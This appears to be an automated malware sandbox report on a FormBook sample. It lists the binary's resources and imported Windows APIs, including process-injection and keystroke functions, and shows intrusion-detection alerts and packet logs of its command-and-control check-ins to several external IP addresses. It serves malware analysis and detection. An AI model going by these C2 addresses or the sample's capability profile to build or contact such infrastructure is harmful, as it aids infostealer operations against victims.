                                                                  RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                  RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                  RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                  RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                  RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                  RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                  RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                  RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                  RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                  RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                  RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                  RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                  RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                  RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                  RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                  RT_RCDATA0xcf7b80x4fe91data1.0003238490374657
                                                                  RT_GROUP_ICON0x11f64c0x76dataEnglishGreat Britain0.6610169491525424
                                                                  RT_GROUP_ICON0x11f6c40x14dataEnglishGreat Britain1.25
                                                                  RT_GROUP_ICON0x11f6d80x14dataEnglishGreat Britain1.15
                                                                  RT_GROUP_ICON0x11f6ec0x14dataEnglishGreat Britain1.25
                                                                  RT_VERSION0x11f7000xdcdataEnglishGreat Britain0.6181818181818182
                                                                  RT_MANIFEST0x11f7dc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                  DLLImport
                                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                  UxTheme.dllIsThemeActive
                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishGreat Britain
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-10-11T16:46:18.519074+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497373.33.130.19080TCP
                                                                  2024-10-11T16:46:39.268041+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44986275.2.103.2380TCP
                                                                  2024-10-11T16:46:41.903142+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44987875.2.103.2380TCP
                                                                  2024-10-11T16:46:41.903142+02002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.44987875.2.103.2380TCP
                                                                  2024-10-11T16:46:44.361140+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44989475.2.103.2380TCP
                                                                  2024-10-11T16:46:46.899827+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44991475.2.103.2380TCP
                                                                  2024-10-11T16:46:52.464063+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44994684.32.84.3280TCP
                                                                  2024-10-11T16:46:55.003767+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44996284.32.84.3280TCP
                                                                  2024-10-11T16:46:57.550227+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44997984.32.84.3280TCP
                                                                  2024-10-11T16:47:00.103088+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44999784.32.84.3280TCP
                                                                  2024-10-11T16:47:07.008317+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450011172.232.112.22180TCP
                                                                  2024-10-11T16:47:09.597012+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450012172.232.112.22180TCP
                                                                  2024-10-11T16:47:12.123305+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450013172.232.112.22180TCP
                                                                  2024-10-11T16:47:14.642002+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450014172.232.112.22180TCP
                                                                  2024-10-11T16:47:22.567893+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450015154.82.70.19580TCP
                                                                  2024-10-11T16:47:25.112083+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450016154.82.70.19580TCP
                                                                  2024-10-11T16:47:27.659030+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450017154.82.70.19580TCP
                                                                  2024-10-11T16:47:50.044927+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450018154.82.70.19580TCP
                                                                  2024-10-11T16:47:55.563773+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500193.33.130.19080TCP
                                                                  2024-10-11T16:47:58.112996+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500203.33.130.19080TCP
                                                                  2024-10-11T16:48:00.795767+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500213.33.130.19080TCP
                                                                  2024-10-11T16:48:03.253231+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500223.33.130.19080TCP
                                                                  2024-10-11T16:48:08.964641+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450023207.154.246.2180TCP
                                                                  2024-10-11T16:48:11.557869+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024207.154.246.2180TCP
                                                                  2024-10-11T16:48:14.038340+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450025207.154.246.2180TCP
                                                                  2024-10-11T16:48:16.622040+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450026207.154.246.2180TCP
                                                                  2024-10-11T16:48:22.411845+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002765.21.196.9080TCP
                                                                  2024-10-11T16:48:24.942364+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002865.21.196.9080TCP
                                                                  2024-10-11T16:48:27.482921+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002965.21.196.9080TCP
                                                                  2024-10-11T16:48:30.033948+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003065.21.196.9080TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 11, 2024 16:46:18.052942991 CEST4973780192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:46:18.057939053 CEST80497373.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:46:18.058048010 CEST4973780192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:46:18.068767071 CEST4973780192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:46:18.073699951 CEST80497373.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:46:18.518805027 CEST80497373.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:46:18.519015074 CEST80497373.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:46:18.519073963 CEST4973780192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:46:18.523880005 CEST4973780192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:46:18.528707981 CEST80497373.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:46:38.792515039 CEST4986280192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:38.797390938 CEST804986275.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:38.798688889 CEST4986280192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:38.808094978 CEST4986280192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:38.814218998 CEST804986275.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:39.267985106 CEST804986275.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:39.268040895 CEST4986280192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:40.315196991 CEST4986280192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:40.320286036 CEST804986275.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:41.333309889 CEST4987880192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:41.338145018 CEST804987875.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:41.338228941 CEST4987880192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:41.351358891 CEST4987880192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:41.356211901 CEST804987875.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:41.903074026 CEST804987875.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:41.903141975 CEST4987880192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:42.862158060 CEST4987880192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:42.867156029 CEST804987875.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:43.880454063 CEST4989480192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:43.885531902 CEST804989475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:43.885685921 CEST4989480192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:43.895654917 CEST4989480192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:43.900959969 CEST804989475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:43.900995016 CEST804989475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:43.901021957 CEST804989475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:43.901048899 CEST804989475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:43.901076078 CEST804989475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:43.901103020 CEST804989475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:43.901129961 CEST804989475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:43.901155949 CEST804989475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:43.901187897 CEST804989475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:44.361022949 CEST804989475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:44.361140013 CEST4989480192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:45.409018040 CEST4989480192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:45.413928032 CEST804989475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:46.427314043 CEST4991480192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:46.432750940 CEST804991475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:46.432936907 CEST4991480192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:46.438786030 CEST4991480192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:46.443717003 CEST804991475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:46.899554014 CEST804991475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:46.899769068 CEST804991475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:46.899827003 CEST4991480192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:46.902225018 CEST4991480192.168.2.475.2.103.23
                                                                  Oct 11, 2024 16:46:46.907191992 CEST804991475.2.103.23192.168.2.4
                                                                  Oct 11, 2024 16:46:51.991323948 CEST4994680192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:51.996228933 CEST804994684.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:51.996311903 CEST4994680192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:52.006825924 CEST4994680192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:52.011781931 CEST804994684.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:52.463866949 CEST804994684.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:52.464062929 CEST4994680192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:53.518338919 CEST4994680192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:53.523983955 CEST804994684.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:54.536437035 CEST4996280192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:54.542552948 CEST804996284.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:54.542656898 CEST4996280192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:54.552618027 CEST4996280192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:54.558638096 CEST804996284.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:55.003710985 CEST804996284.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:55.003767014 CEST4996280192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:56.065146923 CEST4996280192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:56.070542097 CEST804996284.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:57.083180904 CEST4997980192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:57.088680029 CEST804997984.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:57.088757038 CEST4997980192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:57.098006964 CEST4997980192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:57.103159904 CEST804997984.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:57.103230000 CEST804997984.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:57.103322983 CEST804997984.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:57.103367090 CEST804997984.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:57.103455067 CEST804997984.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:57.103482008 CEST804997984.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:57.103508949 CEST804997984.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:57.103534937 CEST804997984.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:57.103565931 CEST804997984.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:57.550009012 CEST804997984.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:57.550226927 CEST4997980192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:58.612097025 CEST4997980192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:58.618171930 CEST804997984.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:59.630305052 CEST4999780192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:59.636213064 CEST804999784.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:46:59.636848927 CEST4999780192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:59.646855116 CEST4999780192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:46:59.651808023 CEST804999784.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:47:00.102770090 CEST804999784.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:47:00.102808952 CEST804999784.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:47:00.102832079 CEST804999784.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:47:00.102845907 CEST804999784.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:47:00.102860928 CEST804999784.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:47:00.102874041 CEST804999784.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:47:00.102890015 CEST804999784.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:47:00.102904081 CEST804999784.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:47:00.102921963 CEST804999784.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:47:00.102937937 CEST804999784.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:47:00.103087902 CEST4999780192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:47:00.103087902 CEST4999780192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:47:00.107486963 CEST4999780192.168.2.484.32.84.32
                                                                  Oct 11, 2024 16:47:00.112903118 CEST804999784.32.84.32192.168.2.4
                                                                  Oct 11, 2024 16:47:06.118316889 CEST5001180192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:06.123265028 CEST8050011172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:06.123357058 CEST5001180192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:06.132155895 CEST5001180192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:06.137238026 CEST8050011172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:07.008179903 CEST8050011172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:07.008217096 CEST8050011172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:07.008316994 CEST5001180192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:07.643327951 CEST5001180192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:08.661633015 CEST5001280192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:08.668961048 CEST8050012172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:08.669204950 CEST5001280192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:08.679039955 CEST5001280192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:08.691277027 CEST8050012172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:09.596858978 CEST8050012172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:09.596910000 CEST8050012172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:09.597012043 CEST5001280192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:10.191623926 CEST5001280192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:11.208388090 CEST5001380192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:11.213450909 CEST8050013172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:11.213593006 CEST5001380192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:11.222754955 CEST5001380192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:11.227906942 CEST8050013172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:11.228018999 CEST8050013172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:11.228065968 CEST8050013172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:11.228092909 CEST8050013172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:11.228120089 CEST8050013172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:11.228171110 CEST8050013172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:11.228198051 CEST8050013172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:11.228224039 CEST8050013172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:11.228250980 CEST8050013172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:12.123183012 CEST8050013172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:12.123229027 CEST8050013172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:12.123305082 CEST5001380192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:12.742904902 CEST5001380192.168.2.4172.232.112.221
